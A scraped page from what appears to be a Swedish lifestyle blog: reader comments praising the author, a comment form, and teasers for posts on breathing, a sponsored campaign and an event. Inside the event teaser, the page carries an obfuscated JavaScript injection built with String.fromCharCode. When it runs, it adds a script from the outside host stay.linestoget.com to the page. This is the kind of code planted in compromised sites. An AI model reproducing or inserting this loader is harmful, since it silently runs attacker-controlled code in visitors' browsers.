 56. Hej! Hittade nyss hit. Tänkte hänga kvar ett tag 🙂 Ni ser ut att ha haft det riktigt bra!
  Håller med dig, bara att läsa nåt annat om man inte gillar det…

 57. Skitbra skrivet My ???. Det är nog vissa människor i ett nötskal ibland.. ’Vet’ mer om andras liv än sitt egna.. En av anledningarna till att jag väljer att flytta från en ’byhåla’ in till Kalmar om två veckor. All credit till dig!!

 58. Skitbra skrivet My 😀💪💪. Det är nog vissa människor i ett nötskal ibland.. ’Vet’ mer om andras liv än sitt egna.. En av anledningarna till att jag väljer att flytta från en ’byhåla’ in till Kalmar om två veckor. All credit till dig!!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/